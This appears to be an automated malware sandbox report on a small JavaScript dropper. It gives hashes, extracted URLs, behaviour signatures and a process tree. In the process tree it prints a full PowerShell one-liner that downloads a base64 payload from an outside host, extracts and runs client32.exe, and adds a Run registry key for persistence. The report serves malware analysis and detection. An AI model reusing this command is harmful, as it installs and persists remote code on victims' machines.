Analysis

  • max time kernel
    120s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20230712-en
  • resource tags

    arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
  • submitted
    29/08/2023, 08:21

General

  • Target

    229122912291.js

  • Size

    3KB

  • MD5

    0632bc0a930491c5232dafbb3d4d2bf8

  • SHA1

    de9c86da5b0a3961baef803c483b7815957d429b

  • SHA256

    7e630371fe8015da34a33370dafc9da2bae45531a4376fd5053a45d8193b4c15

  • SHA512

    b5d84a0ff5ad63337e7e8cefea56403cd77f8243a2c4ef28a0f5b702eb180e40ec4b5a5cfaffd230394e413b620e343629c0e104c8b7c4185a687ebe8eb3b23d

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://instalfrio.cl/destination.txt

exe.dropper

http://instalfrio.cl/destination.txt

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\229122912291.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2676
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C "$u='http://instalfrio.cl/destination.txt';$6=(New-Object System.Net.WebClient).DownloadString($u);$a=[System.Convert]::FromBase64String($6);$d=[System.Environment]::GetFolderPath('ApplicationData')+'\D';if (!(Test-Path $d -PathType Container)) { New-Item -Path $d -ItemType Directory };$p=Join-Path $d 'p.zip';[System.IO.File]::WriteAllBytes($p,$a);try { Add-Type -A System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory($p,$d)} catch { Write-Host 'Failed: ' + $_; exit};$e=Join-Path $d 'client32.exe';if (Test-Path $e -PathType Leaf) { Start-Process -FilePath $e} else { Write-Host 'No exe.'};$s=$d+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='X';$t='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $t;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2896

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2896-4-0x000000001B280000-0x000000001B562000-memory.dmp

    Filesize

    2.9MB

  • memory/2896-5-0x0000000002390000-0x0000000002398000-memory.dmp

    Filesize

    32KB

  • memory/2896-6-0x000007FEF5E30000-0x000007FEF67CD000-memory.dmp

    Filesize

    9.6MB

  • memory/2896-7-0x0000000002910000-0x0000000002990000-memory.dmp

    Filesize

    512KB

  • memory/2896-8-0x0000000002910000-0x0000000002990000-memory.dmp

    Filesize

    512KB

  • memory/2896-9-0x0000000002910000-0x0000000002990000-memory.dmp

    Filesize

    512KB

  • memory/2896-10-0x000007FEF5E30000-0x000007FEF67CD000-memory.dmp

    Filesize

    9.6MB

  • memory/2896-11-0x0000000002910000-0x0000000002990000-memory.dmp

    Filesize

    512KB

  • memory/2896-12-0x000007FEF5E30000-0x000007FEF67CD000-memory.dmp

    Filesize

    9.6MB

  • memory/2896-15-0x000007FEF5E30000-0x000007FEF67CD000-memory.dmp

    Filesize

    9.6MB

  • memory/2896-14-0x000007FEF5E30000-0x000007FEF67CD000-memory.dmp

    Filesize

    9.6MB